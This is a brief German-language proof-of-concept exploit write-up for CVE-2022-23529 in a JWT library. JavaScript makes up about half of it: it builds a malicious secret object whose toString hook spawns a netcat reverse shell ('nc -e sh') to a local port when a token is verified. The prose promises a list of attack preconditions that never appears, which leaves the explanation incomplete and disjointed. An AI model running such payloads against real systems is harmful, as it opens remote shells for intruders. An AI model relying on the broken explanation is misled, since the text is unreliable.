
Proof-of-Concept-Exploit für CVE-2022-23529, der RCE in anfälligen JWT-Bibliotheken über bösartige HMAC-Secret-Objekte demonstriert.
Die JSON-Web-Token (JWT)-Bibliothek in Versionen vor 3.4.6, 4.0.4 und 4.1.5 ist anfällig für RCE.
Die HMAC-Hashfunktionen akzeptieren beliebige Zeichenfolgen als Eingabe, was zu RCE führt.
Aufgrund der Voraussetzungen ist diese Schwachstelle wahrscheinlich nicht ausnutzbar.
Um diese Schwachstelle auszunutzen, müsste ein Angreifer eine der folgenden Bedingungen erfüllen:
var jwt = require('jsonwebtoken');
var token = jwt.sign({"x":"y"}, 'servers_secret');
var poisoned_secret_on_server = {
toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
process.on('exit', ()=> {
require('child_process').exec('nc -e sh 127.0.0.1 9001');
});
process.exit(0)
}
}
jwt.verify(token, poisoned_secret_on_server);